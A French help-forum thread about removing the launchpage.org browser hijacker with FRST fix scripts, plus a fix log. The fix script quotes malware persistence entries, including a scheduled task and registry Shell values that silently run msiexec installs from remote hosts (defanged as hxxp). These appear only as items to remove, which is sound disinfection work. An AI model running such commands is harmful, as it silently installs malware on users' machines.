Supprimer launchpage.org

Résolu
Bonjour,

J'ai suivi le tuto sur le site et cela ne fonctionne pas, cette maudite page s'ouvre encore et encore...

Merci de votre aide

6 réponses

  1. Modérateur
    Salut,

    Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

    Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
    • FRST.txt
    • Shortcut.txt
    • Additionnal.txt


    Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

    0
    1. les voici comme demandé, merci.

      http://pjjoint.malekal.com/files.php?id=FRST_20170607_h10r12f5r7p15
      http://pjjoint.malekal.com/files.php?id=20170607_k15u13k6j14k12
      http://pjjoint.malekal.com/files.php?id=20170607_q5h11i15b7y8
      0
      1. Modérateur
        Vas falloir arreter les cracks et compagnie
        Ca ne te réussit pas.

        Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

        Ouvre le bloc-notes : Touche Windows + R,
        Dans le champs "Exécuter", saisir notepad et OK.
        Copie/Colle dedans ce qui suit :

        CreateRestorePoint:
        CloseProcesses:
        Task: {578BF19C-8591-4D15-B9A3-A0C3B4F7E40F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grerqitherplerkck => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_94CRCM08TXX94CRCM08T&d=20170521 /q <==== ATTENTION
        HKU\S-1-5-21-3236975695-3677505220-2588456723-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cRUExF8Y5FTY2M8E5MdNQFkNWFTlSRWE1F8M3RUI1Rq== /q
        HKU\S-1-5-21-3236975695-3677505220-2588456723-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06062017192922507\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cRUExF8Y5FTY2M8E5MdNQFkNWFTlSRWE1F8M3RUI1Rq== /q
        ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
        2017-05-23 11:31 - 2017-05-23 11:44 - 00000000 ____D C:\Program Files (x86)\{D737C90D-3CD4-4BAC-9ED4-C55922080496}
        2017-05-23 11:31 - 2017-05-23 11:31 - 00000000 ____D C:\Program Files (x86)\MIO
        2017-05-21 03:06 - 2017-05-21 03:12 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Steganos VPN
        2017-05-21 03:05 - 2017-05-22 22:48 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Steganos
        2017-05-21 02:53 - 2017-05-21 02:53 - 00000000 ____D C:\Users\Admin\AppData\Local\mullvad
        2017-05-21 02:52 - 2017-05-21 02:58 - 00000000 ____D C:\Program Files (x86)\Mullvad
        2017-05-21 02:52 - 2017-05-21 02:55 - 00001094 _____ C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mullvad.lnk
        2017-05-21 02:32 - 2017-05-23 20:28 - 00000000 ____D C:\Users\Admin\AppData\Roaming\slitherio
        2017-05-21 02:32 - 2017-05-21 02:32 - 00000000 ____D C:\Users\Admin\AppData\Local\CrashRpt
        2017-05-21 02:31 - 2017-05-23 20:19 - 00000000 ____D C:\Program Files (x86)\nz3vzYPKfU
        2017-05-21 02:31 - 2017-05-22 21:38 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Vatege
        2017-05-21 02:31 - 2017-05-21 02:33 - 00000000 ____D C:\Users\Admin\AppData\Local\Rejercult
        2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\d61102b06ddebb9372c0b3ae96fcd5ea.exe
        2017-05-19 15:16 - 2017-05-19 15:16 - 00051623 _____ C:\WINDOWS\uninstaller.dat
        2017-06-02 15:07 - 2017-06-03 23:41 - 00000000 ____D C:\Program Files (x86)\Default Company Name
        2017-06-02 12:44 - 2017-06-04 17:38 - 00000000 ____D C:\Users\Admin\Desktop\dorks
        2017-06-01 10:31 - 2017-06-03 23:31 - 00000000 ____D C:\Users\Admin\AppData\Local\glory
        2017-06-01 10:31 - 2017-06-01 10:31 - 00000000 ____D C:\Program Files (x86)\{89F9A552-E91A-4876-A597-360520C941B8}
        2017-05-31 23:32 - 2017-05-31 23:32 - 00000000 ____D C:\Users\Admin\AppData\Local\UNP
        2017-05-31 22:38 - 2017-06-06 15:56 - 00000000 ____D C:\WINDOWS\system32\UNP
        2017-05-31 22:38 - 2017-05-31 22:39 - 00000000 ____D C:\Program Files\UNP
        2017-05-28 20:18 - 2017-06-02 13:55 - 00000000 _____ C:\WINDOWS\SysWOW64\1
        2017-05-27 14:51 - 2017-05-30 19:50 - 00000000 ____D C:\Users\Admin\AppData\Local\background_fault
        2017-05-27 14:50 - 2017-05-27 14:50 - 00000000 ____D C:\Program Files (x86)\{6E29053C-A148-445D-ADBC-451042C16B78}
        2017-05-06 16:38 - 2017-05-06 16:38 - 0000006 ____S () C:\ProgramData\7a4ab1ca1b9f1870d40f607d33e5639879927274
        Hosts:
        EmptyTemp:
        RemoveProxy:
        Reboot:


        Une fois, le texte collé dans le Bloc-notes,
        Menu "Fichier" puis "Enregistrer sous",
        A gauche, place toi sur le Bureau,
        Dans le champs en bas, nom du fichier mets : fixlist.txt
        Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

        Relance FRST et clique sur le bouton "Corriger / Fix"
        Un redémarrage sera peut-être nécessaire ( pas obligatoire )
        Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

        Redémarre l'ordinateur.

        2°)
        Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
        (ne pas utiliser zoek et faire une réinitialisation manuelle)

        3°)
        Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

        4°)
        Vois ce que cela donne et si des améliorations ont eu lieu.
        Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
        Refais un scan FRST et donne les nouveaux rapports via pjjoint.

        0
        1. Bonjour J'ai le même soucis:(

          https://pjjoint.malekal.com/files.php?id=20170625_11q10j146s9
          https://pjjoint.malekal.com/files.php?id=FRST_20170625_j9g14d13v1410
          https://pjjoint.malekal.com/files.php?id=20170625_b119i7p5w8

          Merci d'avance
          0
          1. Modérateur
            Salut,

            Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

            Ouvre le bloc-notes : Touche Windows + R,
            Dans le champs "Exécuter", saisir notepad et OK.
            Copie/Colle dedans ce qui suit :

            CreateRestorePoint:
            CloseProcesses:
            ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk -> C:\Program Files (x86)\Epson Software\Epson Manual\Launcher\EPSMLAN.EXE (Seiko Epson Corporation) -> /LA "FR" /FR "DESKTOP"
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            Hosts:
            EmptyTemp:
            RemoveProxy:
            Reboot:


            Une fois, le texte collé dans le Bloc-notes,
            Menu "Fichier" puis "Enregistrer sous",
            A gauche, place toi sur le Bureau,
            Dans le champs en bas, nom du fichier mets : fixlist.txt
            Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

            Relance FRST et clique sur le bouton "Corriger / Fix"
            Un redémarrage sera peut-être nécessaire ( pas obligatoire )
            Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

            Redémarre l'ordinateur.
            0
          2. @Malekal_morte-Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 25-06-2017 01
            Exécuté par Famille (27-06-2017 08:53:30) Run:1
            Exécuté depuis C:\Users\Famille\Desktop
            Profils chargés: Famille (Profils disponibles: UpdatusUser & Famille)
            Mode d'amorçage: Normal
            ==============================================

            fixlist contenu:
            CreateRestorePoint:
            CloseProcesses:
            ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk -> C:\Program Files (x86)\Epson Software\Epson Manual\Launcher\EPSMLAN.EXE (Seiko Epson Corporation) -> /LA "FR" /FR "DESKTOP"
            ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
            Hosts:
            EmptyTemp:
            RemoveProxy:
            Reboot:

            Le Point de restauration a été créé avec succès.
            Processus fermé avec succès.
            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk => Raccourci argument supprimé(es) avec succès.
            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
            C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
            Hosts restauré(es) avec succès.

            ========= RemoveProxy: =========

            HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
            HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
            HKU\S-1-5-21-2720885648-2990538176-1464601800-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
            HKU\S-1-5-21-2720885648-2990538176-1464601800-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès

            ========= Fin de RemoveProxy: =========

            =========== EmptyTemp: ==========

            BITS transfer queue => 7364608 B
            DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 35226758 B
            Java, Flash, Steam htmlcache => 748 B
            Windows/system/drivers => 14226768 B
            Edge => 803 B
            Chrome => 0 B
            Firefox => 312300588 B
            Opera => 0 B

            Temp, IE cache, history, cookies, recent:
            Default => 0 B
            Users => 0 B
            ProgramData => 0 B
            Public => 0 B
            systemprofile => 0 B
            systemprofile32 => 0 B
            LocalService => 3314 B
            NetworkService => 49741824 B
            UpdatusUser => 0 B
            Famille => 114642344 B

            RecycleBin => 0 B
            EmptyTemp: => 508.8 MB données temporaires supprimées.

            ================================

            Le système a dû redémarrer.

            Fin de Fixlog 08:54:46

            0
          3. Modérateur
            @Stephaniec'est mieux ?
            0
          4. Oui c'est parfait cette maudite page a enfin disparu .
            Merci beaucoup
            0
        2. Modérateur
          super =)

          Supprime le dossier C:\FRST

          Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
          Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.

          Quelques conseils :

          Pour ne plus te faire avoir.
          A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
          (Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

          0
          1. Je pense que c'est tout bon pour moi aussi :)
            Mille mercis
            0